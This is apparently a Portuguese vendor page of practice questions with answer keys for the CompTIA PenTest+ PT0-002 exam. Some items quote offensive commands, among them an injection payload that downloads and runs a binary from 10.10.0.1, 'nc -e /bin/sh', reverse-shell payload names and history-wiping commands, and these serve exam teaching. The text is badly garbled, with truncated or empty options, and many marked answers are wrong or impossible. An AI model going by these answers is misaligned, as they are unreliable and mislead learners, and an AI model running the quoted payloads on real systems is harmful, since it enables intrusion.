NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Sucesso no exame CompTIA PT0-002: Testes de simulação e recursos de estudo, Certificação CompTIA PenTest+ | SPOTO

Prepare-se para o sucesso em seu exame de certificação CompTIA PenTest+ (PT0-002) com nossos testes simulados & Recursos de estudo. A melhor maneira de se preparar para o exame é praticando as últimas perguntas do exame. Nossos materiais de estudo incluem testes práticos, perguntas de amostra, dumps de exame e perguntas e respostas de exame, projetados para ajudá-lo a alcançar o sucesso. A certificação CompTIA PenTest+ é ideal para profissionais de segurança cibernética encarregados de testes de penetração e gerenciamento de vulnerabilidades. Com acesso aos nossos exames simulados e simulador de exames, pode simular as condições reais do exame e aumentar a sua confiança. Utilize os nossos materiais de exame e respostas de exame para reforçar a sua compreensão e preparação para o exame PT0-002. Prepare-se com confiança e obtenha sucesso no exame com nossos recursos abrangentes de estudo e testes simulados

Faça outros exames online

Pergunta #1
Um profissional de segurança deseja testar um dispositivo IoT enviando um pacote inválido para um serviço proprietário que escuta na porta TCP 3011. Qual das seguintes opções permitiria que o profissional de segurança manipulasse fácil e programaticamente o comprimento do cabeçalho TCP e a soma de verificação usando números arbitrários e observasse como o serviço proprietário responde?
A. Nmap
B. tcpdump
C. capy
D. ping3
Ver resposta
Resposta correta: C
Pergunta #2
Um testador de penetração obteve uma shell de baixo privilégio num servidor Windows com uma configuração predefinida e agora quer explorar a capacidade de explorar permissões de serviço mal configuradas. Qual dos seguintes comandos ajudaria o testador a INICIAR este processo?
A. certutil -urlcache -split -f http://192
B. powershell (New-Object System
C. chtasks /query /fo LIST /v | find /I "Tempo de execução seguinte:"
D. get http://192
Ver resposta
Resposta correta: A
Pergunta #3
Um técnico de testes de penetração obtém acesso a um sistema e estabelece persistência e, em seguida, executa os seguintes comandos: cat /dev/null > temp touch -r .bash_history temp mv temp .bash_history Qual das seguintes acções é a mais provável de ser executada pelo técnico de testes?
A. Redirecionar o histórico do Bash para /dev/null
B. Fazer uma cópia do histórico de Bash do utilizador para posterior enumeração
C. Cobrir os rastos limpando o histórico do Bash
D. Criar ficheiros de engodo no sistema para confundir os responsáveis pela resposta a incidentes
Ver resposta
Resposta correta: A
Pergunta #4
Um engenheiro de segurança identificou um novo servidor na rede e pretende analisar o anfitrião para determinar se está a executar uma versão aprovada do Linux e uma versão corrigida do Apache. Qual dos seguintes comandos realizará essa tarefa?
A. nmap -f -sV -p80 192
B. nmap -sS -sL -p80 192
C. map -A -T4 -p80 192
D. map -O -v -p80 192
Ver resposta
Resposta correta: A
Pergunta #5
Dado o seguinte código: Qual dos seguintes métodos é o MELHOR para evitar este tipo de ataque? (Escolha dois.)
A. Firewall para aplicações Web
B. Consultas parametrizadas
C. Codificação de saída
D. Tokens de sessão
E. Validação dos dados de entrada
F. Codificação Base64
Ver resposta
Resposta correta: BE
Pergunta #6
Um técnico de testes de penetração concluiu recentemente uma análise da segurança de um dispositivo de rede principal num ambiente empresarial. As principais conclusões são as seguintes: (cid:127) O seguinte pedido foi intercetado indo para o dispositivo de rede: GET /login HTTP/1.1 Anfitrião: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk (cid:127) As interfaces de gestão de rede estão disponíveis
A. Aplicar requisitos reforçados de complexidade das palavras-passe
B. Desativar ou atualizar o daemon SSH
C. esativar a configuração do redireccionamento HTTP/301
D. riar uma rede fora de banda para gestão
E. Implementar um melhor método de autenticação
F. Eliminar as interfaces de gestão e controlo da rede
Ver resposta
Resposta correta: CD
Pergunta #7
Uma empresa contratou um técnico de testes de penetração para efetuar um teste de engenharia social aos seus empregados. Embora o técnico não tenha encontrado os números de telefone dos empregados no sítio Web da empresa, o técnico soube que o catálogo telefónico completo foi publicado há alguns meses. Em qual dos seguintes locais o técnico deve procurar PRIMEIRO os números dos empregados?
A. Arquivo Web
B. GitHub
C. Metadados dos ficheiros
D. Fóruns subterrâneos
Ver resposta
Resposta correta: A
Pergunta #8
Um executivo precisa de utilizar o Wi-Fi para se ligar ao servidor da empresa enquanto viaja. Ao procurar ligações Wi-Fi disponíveis, o executivo repara num ponto de acesso disponível para uma cadeia de hotéis que não está disponível no local onde o executivo está alojado. Qual dos seguintes ataques é mais provável que o executivo esteja a sofrer?
A. Alteração de dados
B. Amplificação
C. Portal cativo
D. Gémeo mau
Ver resposta
Resposta correta: D
Pergunta #9
Num repositório de ficheiros de rede desprotegido, um testador de penetração descobre um ficheiro de texto que contém nomes de utilizador e palavras-passe em texto não encriptado e uma folha de cálculo que contém dados de 50 funcionários, incluindo nomes completos, funções e números de série. O testador percebe que algumas das senhas no arquivo de texto seguem o formato: . Qual das seguintes seria a melhor ação para o testador tomar PRÓXIMO com essas informações?
A. Criar um dicionário de palavras-passe personalizado como preparação para o teste de pulverização de palavras-passe
B. Recomendar a utilização de um gestor/cofre de senhas em vez de ficheiros de texto para armazenar senhas de forma segura
C. Recomendar a configuração de regras de complexidade das palavras-passe em todos os sistemas e aplicações
D. Documentar o repositório de ficheiros desprotegido como uma descoberta no relatório de testes de penetração
Ver resposta
Resposta correta: D
Pergunta #10
Foi contratado um técnico de testes de penetração para analisar a segurança sem fios. O testador implantou um AP sem fio malicioso que imita a configuração do WiFi da empresa alvo. O testador de penetração agora quer tentar forçar as estações sem fio próximas a se conectarem ao AP malicioso. Qual das seguintes etapas o testador deve seguir em seguida?
A. Enviar quadros de desautenticação para as estações
B. Efetuar interferências em todos os canais de 2,4 GHz e 5 GHz
C. efinir o AP malicioso para transmitir dentro de canais de seleção de frequência dinâmica
D. Modificar a configuração do AP malicioso para não utilizar uma chave pré-partilhada
Ver resposta
Resposta correta: B
Pergunta #11
Um testador de penetração estava a realizar um teste de penetração e descobriu que o tráfego de rede já não estava a atingir o endereço IP do cliente. O testador descobriu mais tarde que o SOC tinha usado sinkholing no endereço IP do testador de penetração. Qual das seguintes opções descreve MELHOR o que aconteceu?
A. O técnico de testes de penetração estava a testar os activos errados
B. O processo de planeamento não garantiu que todas as equipas fossem notificadas
C. O cliente não estava preparado para o início da avaliação
D. O responsável pelo teste de penetração tinha informações de contacto incorrectas
Ver resposta
Resposta correta: C
Pergunta #12
Qual das seguintes é a vulnerabilidade mais comum associada aos dispositivos loT que estão diretamente ligados à Internet? Os dispositivos IoT são frequentemente fornecidos com palavras-passe predefinidas, que são facilmente detectáveis e amplamente conhecidas. Muitos utilizadores não alteram estas credenciais predefinidas, deixando os dispositivos vulneráveis a acessos não autorizados. Este problema é uma das vulnerabilidades mais comuns associadas aos dispositivos IoT ligados diretamente à Internet. Os atacantes podem explorar estas palavras-passe predefinidas para obter
A. Sistemas operativos não suportados
B. Suscetibilidade a ataques DDoS
C. Incapacidade de trabalhar em rede
D. A existência de palavras-passe predefinidas
Ver resposta
Resposta correta: D
Pergunta #13
Um testador de penetração explorou uma vulnerabilidade num servidor e executou remotamente um payload para obter uma shell. No entanto, não foi estabelecida uma ligação e não foram apresentados erros na execução do payload. O testador de penetração suspeitou que um dispositivo de rede, como um IPS ou uma firewall de próxima geração, estava a interromper a ligação. Qual das seguintes cargas úteis tem MAIS probabilidade de estabelecer uma shell com êxito?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
Ver resposta
Resposta correta: D
Pergunta #14
Qual das seguintes expressões em Python aumenta uma variável val em um (Escolhe duas.)
A. al++
B. +val
C. al=(val+1)
D. +val
E. al=val++
F. val+=1
Ver resposta
Resposta correta: C
Pergunta #15
Quais dos seguintes riscos de segurança das aplicações Web fazem parte do OWASP Top 10 v2017? (Escolha dois.)
A. Transbordos de memória (buffer overflows)
B. Scripting entre sítios
C. Ataques por condições raciais
D. Ataques de dia zero
E. Defeitos de injeção
F. Ataques de ransomware
Ver resposta
Resposta correta: C
Pergunta #16
Um testador de penetração obteve acesso root a um servidor de arquivos baseado em Linux e gostaria de manter a persistência após a reinicialização. Qual das seguintes técnicas seria a MELHOR para apoiar este objetivo?
A. Crie um serviço systemd one-shot para estabelecer uma shell reversa
B. Obter o ficheiro /etc/shadow e aplicar força bruta à palavra-passe do root
C. Executar o comando nc -e /bin/sh<
D. eslocar-se lateralmente para criar uma conta de utilizador no LDAP
Ver resposta
Resposta correta: B
Pergunta #17
Qual das seguintes opções explica melhor por que razão a comunicação é uma fase vital de um teste de penetração? A comunicação é uma fase vital de um teste de penetração para garantir que todas as partes envolvidas estão cientes do progresso do teste, das descobertas e de qualquer impacto potencial nas operações comerciais. Discutir a consciência situacional envolve a partilha de informações em tempo real sobre a postura de segurança, quaisquer vulnerabilidades encontradas e potenciais riscos. Isto permite que a organização tome decisões informadas, mitigue os riscos prontamente e garanta que a segurança seja protegida
A. Discutir a consciência situacional
B. ara estabelecer uma relação com o contacto de emergência
C. Explicar o processo de destruição de dados
D. Para garantir a probabilidade de futuras avaliações
Ver resposta
Resposta correta: A
Pergunta #18
Um testador de penetração está a testar uma aplicação Web que está alojada num fornecedor de nuvem pública. O testador é capaz de consultar os metadados do provedor e obter as credenciais usadas pela instância para se autenticar. Qual das seguintes vulnerabilidades foi explorada pelo testador?
A. Falsificação de pedidos entre sítios
B. Falsificação de pedidos do lado do servidor
C. Inclusão remota de ficheiros
D. Inclusão do código local
Ver resposta
Resposta correta: B
Pergunta #19
Um testador de penetração conduziu uma varredura de descoberta que gerou o seguinte: Qual dos seguintes comandos gerou os resultados acima e os transformará em uma lista de hosts ativos para análise posterior?
A. nmap -oG list
B. nmap -sn 192
C. map --open 192
D. map -o 192
Ver resposta
Resposta correta: AC
Pergunta #20
Qual das seguintes opções descreve MELHOR o OWASP Top 10? (Escolha duas.)
A. Os riscos mais críticos das aplicações Web
B. Uma lista de todos os riscos das aplicações Web
C. Os riscos definidos por ordem de importância
D. Uma norma de segurança para aplicações Web
E. Um quadro de governação do risco e de conformidade
F. Uma lista de verificação das vulnerabilidades do Apache
Ver resposta
Resposta correta: D
Pergunta #21
Um cliente pretende que uma empresa de avaliação de segurança efectue um teste de penetração no seu hot site. O objetivo do teste é determinar a eficácia das defesas que protegem contra interrupções na continuidade do negócio. Qual das seguintes é a ação MAIS importante a tomar antes de iniciar este tipo de avaliação?
A. Certificar-se de que o cliente assinou a SOW
B. Verificar se o cliente concedeu acesso à rede ao hot site
C. eterminar se o ambiente de ativação pós-falha depende de recursos que não pertencem ao cliente
D. stabelecer procedimentos de comunicação e de escalonamento com o cliente
Ver resposta
Resposta correta: A
Pergunta #22
Um técnico de testes de penetração está a analisar a seguinte SOW antes de se envolver com um cliente: "Os diagramas de rede, o inventário de activos lógicos e físicos e os nomes dos empregados devem ser tratados como confidenciais para o cliente. Após a conclusão do trabalho, o responsável pelo teste de penetração apresentará os resultados ao CISO (Chief Information Security Officer) do cliente através de protocolos encriptados e, posteriormente, eliminará todos os resultados apagando-os de forma segura." Com base nas informações contidas na SOW, qual dos seguintes comportamentos
A. Utilização de ferramentas próprias de testes de penetração que não estejam disponíveis ao público ou ao cliente para efeitos de auditoria e inspeção
B. Utilizar criptografia de chave pública para garantir que os resultados sejam entregues ao CISO após a conclusão do trabalho
C. Não partilhar com o cliente as vulnerabilidades críticas que existem na arquitetura do cliente para apaziguar a equipa de liderança sénior do cliente
D. Procurar ajuda para o envolvimento em fóruns de hackers clandestinos, partilhando o endereço IP público do cliente
E. Utilizar uma ferramenta de apagamento baseada em software para apagar as descobertas do cliente do computador portátil do técnico de testes de penetração
F. Retenção da SOW na empresa do técnico de testes de penetração para utilização futura, de modo a que a equipa de vendas possa planear futuros compromissos
Ver resposta
Resposta correta: CD
Pergunta #23
A realização de um teste de penetração num ambiente com dispositivos SCADA acarreta um risco de segurança adicional, uma vez que
A. Os dispositivos produzem mais calor e consomem mais energia
B. Os dispositivos estão obsoletos e já não estão disponíveis para substituição
C. s protocolos são mais difíceis de compreender
D. s dispositivos podem causar efeitos no mundo físico
Ver resposta
Resposta correta: D
Pergunta #24
Um testador de penetração obteve os seguintes resultados depois de analisar um servidor web usando o utilitário dirb: ... PALAVRAS GERADAS: 4612 ---- URL de análise: http://10.2.10.13/ ---- + http://10.2.10.13/about (CODE:200|SIZE:1520) + http://10.2.10.13/home.html (CODE:200|SIZE:214) + http://10.2.10.13/index.html (CODE:200|SIZE:214) + http://10.2.10.13/info (CODE:200|SIZE:214) ... DOWNLOADED: 4612 - FOUND: 4 Qual dos seguintes elementos é MAIS provável que contenha informações úteis para o testador de penetração?
A. index
B. sobre C
Ver resposta
Resposta correta: AC
Pergunta #25
Um técnico de testes de penetração concluiu recentemente uma análise da segurança de um dispositivo de rede principal num ambiente empresarial. As principais conclusões são as seguintes: O seguinte pedido foi intercetado no dispositivo de rede:GET /login HTTP/1.1 Anfitrião: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0)Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk As interfaces de gestão de rede estão disponíveis no sistema de produção n
A. Aplicar requisitos reforçados de complexidade das palavras-passe
B. Desativar ou atualizar o daemon SSH
C. Desativar a configuração do redireccionamento HTTP/301
D. Criar uma rede fora de banda para gestão
E. Implementar um melhor método de autenticação
F. Eliminar as interfaces de gestão e controlo da rede
Ver resposta
Resposta correta: AE
Pergunta #26
Um técnico de testes de penetração escreveu o seguinte script para ser utilizado num compromisso: Qual das seguintes acções será executada por este script?
A. Procurar portas abertas
B. Escutar uma concha invertida
C. Tentativa de inundar portas abertas
D. Criar um túnel encriptado
Ver resposta
Resposta correta: A
Pergunta #27
Um testador de penetração está a testar a validação de entrada num formulário de pesquisa que foi descoberto num Web site. Qual dos seguintes caracteres é a MELHOR opção para testar as vulnerabilidades do sítio Web?
A. Vírgula
B. Traço duplo
C. Aspas simples
D. Ponto e vírgula
Ver resposta
Resposta correta: C
Pergunta #28
Um testador de penetração conseguiu explorar uma vulnerabilidade usando a seguinte carga útil: IF (1=1) WAIT FOR DELAY '0:0:15' Qual das seguintes acções seria a melhor forma de mitigar este tipo de ataque? O payload utilizado pelo testador de penetração é um tipo de ataque cego de injeção SQL que atrasa a resposta da base de dados em 15 segundos se a condição for verdadeira. Isto pode ser utilizado para extrair informações da base de dados fazendo uma série de perguntas verdadeiras ou falsas. Para evitar este tipo de ataque, a melhor prática é
A. Encriptar palavras-passe
B. Parametrização de consultas
C. Saída de codificação
D. Higienização de HTML
Ver resposta
Resposta correta: B
Pergunta #29
Um técnico de testes de penetração pretende efetuar um reconhecimento sem ser detectado. Qual das seguintes actividades tem uma probabilidade MÍNIMA de ser detectada? (Escolha duas.)
A. Investigação de fonte aberta
B. Uma varredura de ping C
C.
D.
Ver resposta
Resposta correta: B
Pergunta #30
Uma nova empresa de segurança está a integrar o seu primeiro cliente. O cliente só permitiu testes durante o fim de semana e precisava dos resultados na segunda-feira de manhã. No entanto, a equipa de avaliação não conseguiu aceder ao ambiente, como previsto, até segunda-feira. Qual dos seguintes elementos a empresa de segurança deveria ter adquirido ANTES do início da avaliação?
A. Uma declaração de trabalho assinada
B. As contas de utilizador correctas e as respectivas palavras-passe C
Ver resposta
Resposta correta: B
Pergunta #31
Dado o seguinte resultado: User-agent:* Disallow: /author/ Não é permitido: /xmlrpc.php Não é permitido: /wp-admin Disallow: /page/ Durante qual das seguintes actividades foi este output MAIS provavelmente obtido?
A. Raspagem de sítios Web
B. Clonagem de sítios Web
C. Enumeração de domínios
D. Enumeração de URL
Ver resposta
Resposta correta: CF
Pergunta #32
Penetração Numa avaliação para uma organização cliente, um testador de penetração repara que foram instaladas várias versões desactualizadas de pacotes de software ...s servidores críticos. Qual das seguintes opções atenuaria melhor esse problema? A melhor forma de atenuar este problema é implementar programas de correção e controlo de alterações, que são processos que envolvem a aplicação de actualizações ou correcções a pacotes de software para resolver vulnerabilidades, bugs ou problemas de desempenho e gerir ou documentar as alterações feitas ao pacote de software
A. Implementação de programas de correção e controlo de alterações
B. Revisão dos scripts de cliente utilizados para efetuar actualizações do sistema
C. Formação correctiva para os administradores de sistemas do cliente
D. Abster-se de aplicar patches nos sistemas até à aprovação da garantia de qualidade
Ver resposta
Resposta correta: A
Pergunta #33
Um técnico de testes de penetração está a preparar-se para realizar actividades para um cliente que requerem uma perturbação mínima das operações da empresa. Quais das seguintes opções são consideradas ferramentas de reconhecimento passivo? (Escolha duas.) A.Wireshark
A.
B.
C.
D.
E.
Ver resposta
Resposta correta: AC
Pergunta #34
É chamada a adição de valores de cadeia a outra cadeia:
A. Compilação
B. Ligação
C. oncatenação
D. onjunção
Ver resposta
Resposta correta: A
Pergunta #35
Uma empresa efectuou um ataque de phishing simulado, enviando aos seus empregados mensagens de correio eletrónico que incluíam uma ligação para um site que imitava o portal SSO da empresa. Oitenta por cento dos funcionários que receberam o e-mail clicaram na ligação e forneceram as suas credenciais empresariais no site falso. Qual das seguintes recomendações seria a MELHOR para resolver esta situação?
A. Implementar um programa recorrente de sensibilização para a cibersegurança para todos os utilizadores
B. Implementar a autenticação multifactor em todas as aplicações empresariais
C. Restringir a navegação na Web aos funcionários, definindo uma lista de sites não aprovados no proxy da empresa
D. Implementar um gateway de segurança de correio eletrónico para bloquear o spam e o malware das comunicações por correio eletrónico
Ver resposta
Resposta correta: A
Pergunta #36
Um testador de penetração conseguiu obter acesso a um sistema usando um exploit. Segue-se um excerto do código que foi utilizado: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/ tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${I FS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Qual dos seguintes comandos o técnico de testes de penetração deve executar após o envolvimento?
A. grep -v apache ~/
B. rm -rf /tmp/apache C
Ver resposta
Resposta correta: D
Pergunta #37
Uma equipa de testes de penetração está a realizar um teste de penetração física para entrar num edifício. Qual das seguintes é a razão pela qual os testadores de penetração devem levar consigo cópias dos documentos de compromisso?
A. Como cópia de segurança em caso de perda dos documentos originais
B. Para os guiar através das entradas do edifício
C. Para validar as informações de faturação com o cliente
D. Como prova no caso de serem descobertos
Ver resposta
Resposta correta: A
Pergunta #38
Uma empresa contratou uma equipa de testes de penetração para analisar os sistemas ciber-físicos de uma fábrica. A equipa descobriu imediatamente que os sistemas de supervisão e os PLCs estão ambos ligados à intranet da empresa. Qual das seguintes suposições, se feitas pela equipa de testes de penetração, é a MAIS provável de ser válida?
A. Os autómatos não actuam sobre comandos injectados através da rede
B. s supervisores e os controladores estão numa rede virtual separada por predefinição
C. Os controladores não validam a origem dos comandos
D. Os sistemas de supervisão detectarão uma injeção maliciosa de código/comandos
Ver resposta
Resposta correta: C
Pergunta #39
Um técnico de testes de penetração que está a fazer uma avaliação de segurança descobre que uma vulnerabilidade crítica está a ser ativamente explorada por cibercriminosos. Qual das seguintes opções deve o testador fazer a seguir?
A. Contactar o ponto de contacto principal
B. Tentar derrubar os atacantes
C. Chamar imediatamente os agentes da autoridade
D. Recolher as provas adequadas e acrescentá-las ao relatório final
Ver resposta
Resposta correta: CE
Pergunta #40
Um verificador de penetração está a enumerar acções e recebe o seguinte resultado: Qual dos seguintes itens o testador de penetração deve enumerar a seguir? A saída exibida é típica do que se pode ver ao usar uma ferramenta como smbclient ou enum4linux para listar diretórios compartilhados em um sistema que usa o protocolo SMB (Server Message Block). Aqui está uma breve visão geral dos recursos compartilhados que foram encontrados: 1. print$ - Este compartilhamento é geralmente usado para drivers de impressora. 2. home - Pode ser o diretor da casa de um utilizador
A. ev
B. rint$
C. ome
D. otas
Ver resposta
Resposta correta: A
Pergunta #41
Um testador de penetração executou um comando ping -A durante um teste de ambiente desconhecido, e ele retornou um pacote de 128 TTL. Qual dos sistemas operacionais a seguir MAIS provavelmente retornaria um pacote desse tipo?
A. Janelas
B. Apple
C. inux
D. Android
Ver resposta
Resposta correta: A
Pergunta #42
Qual dos seguintes documentos descreve actividades, resultados e calendários específicos para um técnico de testes de penetração?
A. NDA
B. SA
C. OW
D. OU
Ver resposta
Resposta correta: C
Pergunta #43
Um testador de penetração que está a fazer uma avaliação solicitada pela empresa gostaria de enviar tráfego para outro sistema utilizando a marcação dupla. Qual das seguintes técnicas seria a MELHOR para atingir este objetivo?
A. Clonagem RFID
B. Marcação RFID
C. Meta-marcação
D. Aninhamento de etiquetas
Ver resposta
Resposta correta: D
Pergunta #44
Qual dos seguintes elementos pode ser utilizado para armazenar dados alfanuméricos que podem ser introduzidos em scripts ou programas como entrada para ferramentas de teste de penetração?
A. Dicionário
B. Diretório
C. Symlink
D. Catálogo
E. For-loop
Ver resposta
Resposta correta: A
Pergunta #45
O seguinte snippet do PowerShell foi extraído de um registo de uma máquina atacante:Um testador de penetração gostaria de identificar a presença de uma matriz. Qual dos seguintes números de linha definiria a matriz?
A. Linha 8
B. Linha 13
C. Linha 19
D. Linha 20
Ver resposta
Resposta correta: A
Pergunta #46
Qual das seguintes opções descreve as MAIORES preocupações sobre a utilização de bibliotecas de código aberto de terceiros no código da aplicação? (Escolha duas.)
A. As bibliotecas podem ser vulneráveis
B. O licenciamento do software é ambíguo C
C.
D.
Ver resposta
Resposta correta: B
Pergunta #47
Um consultor está a analisar o seguinte resultado após relatórios de problemas de conetividade intermitentes: ? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ? (192.168.1.12) em 34:a4:be:09:44:f4 em en0 ifscope [ethernet] ? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet] ? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet] ? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ? (192.168.1.255) em ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff em en0 ifscope [ethernet] ? (224.0.0.251) em 01:02:5e:7
A. Um dispositivo na rede tem um endereço IP na sub-rede errada
B. Uma sessão multicast foi iniciada usando o grupo multicast errado
C. Um ataque de inundação ARP está a utilizar o endereço de difusão para efetuar DDoS
D. Um dispositivo na rede envenenou a cache ARP
Ver resposta
Resposta correta: AE

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: